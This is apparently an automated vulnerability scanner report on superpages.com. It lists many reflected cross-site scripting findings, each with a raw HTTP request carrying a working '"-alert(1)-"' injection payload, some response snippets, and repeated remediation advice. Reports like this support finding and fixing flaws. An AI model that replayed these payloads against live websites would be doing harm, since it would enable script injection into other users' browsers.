GET /common/jsf5868"-alert(1)-"87bdb7fff34/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bb72"-alert(1)-"9311ac1eae6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/spflyouts.1.0.js3bb72"-alert(1)-"9311ac1eae6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e93e"-alert(1)-"e0257fb0cce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common6e93e"-alert(1)-"e0257fb0cce/js/stPtsDropDown.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 567fe"-alert(1)-"a7192a45b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js567fe"-alert(1)-"a7192a45b5c/stPtsDropDown.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19d80"-alert(1)-"d75b6dd7fef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/stPtsDropDown.js19d80"-alert(1)-"d75b6dd7fef HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf650"-alert(1)-"78afb6ecf46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonbf650"-alert(1)-"78afb6ecf46/js/swfobject.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2faa4"-alert(1)-"0330f6d9404 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js2faa4"-alert(1)-"0330f6d9404/swfobject.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f05f"-alert(1)-"e45de1e8136 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/swfobject.js9f05f"-alert(1)-"e45de1e8136 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fded6"-alert(1)-"0b6dc67d1c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonfded6"-alert(1)-"0b6dc67d1c1/js/widget.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 439d0"-alert(1)-"5c86a9d76c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js439d0"-alert(1)-"5c86a9d76c0/widget.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a2b"-alert(1)-"07809799c0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/widget.jsc2a2b"-alert(1)-"07809799c0f HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3dee"-alert(1)-"9e04f429db9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond3dee"-alert(1)-"9e04f429db9/shared.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32abc"-alert(1)-"2bf1a02631b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/shared.js32abc"-alert(1)-"2bf1a02631b HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50197"-alert(1)-"c2eac5868b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms50197"-alert(1)-"c2eac5868b/js/verifyShopping.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7601"-alert(1)-"10e26b82b50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/jsd7601"-alert(1)-"10e26b82b50/verifyShopping.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3dc1"-alert(1)-"4f40b38d03b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/js/verifyShopping.jsb3dc1"-alert(1)-"4f40b38d03b HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c4c"-alert(1)-"291bea29b59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jspd0c4c"-alert(1)-"291bea29b59 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jspd0c4c"-alert(1)-"291bea29b59?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
1.462. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://yellowpages.superpages.com
Path:
/profile.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3b62"-alert(1)-"19f13f0d1a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?d3b62"-alert(1)-"19f13f0d1a1=1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=E40CDAAE7234B340F5E476169B1B68EE; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 32437 Date: Sun, 19 Dec 2010 03:39:57 GMT Connection: close
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?d3b62"-alert(1)-"19f13f0d1a1=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5fbb"-alert(1)-"b1561fffde0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profilera5fbb"-alert(1)-"b1561fffde0/abook.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4f1f"-alert(1)-"6e2adb7dd06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jspd4f1f"-alert(1)-"6e2adb7dd06 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e951a"-alert(1)-"b64c38705bf was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=e951a"-alert(1)-"b64c38705bf HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=15C201AFDF87CEF38C2736905BA91573; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 64044 Date: Sun, 19 Dec 2010 03:41:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... m'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=e951a"-alert(1)-"b64c38705bf"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4aaab"-alert(1)-"3ce839e7847 was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCoupons4aaab"-alert(1)-"3ce839e7847 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=2A454A9F2598C6898BE37FCBC8B671AA; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 63958 Date: Sun, 19 Dec 2010 03:40:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons4aaab"-alert(1)-"3ce839e7847"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf02d"-alert(1)-"752a1001e48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profilercf02d"-alert(1)-"752a1001e48/css/alert.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2f"-alert(1)-"d7b62d0a99e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/css6eb2f"-alert(1)-"d7b62d0a99e/alert.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b50"-alert(1)-"14ed31f715f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/css/alert.cssb6b50"-alert(1)-"14ed31f715f HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37a6d"-alert(1)-"12e19a3b5e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler37a6d"-alert(1)-"12e19a3b5e6/js/mydir.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f663a"-alert(1)-"5390c8865a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/jsf663a"-alert(1)-"5390c8865a/mydir.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9327e"-alert(1)-"5a6fc7ac2bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/js/mydir.js9327e"-alert(1)-"5a6fc7ac2bb HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0e73"-alert(1)-"1ba684b4574 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
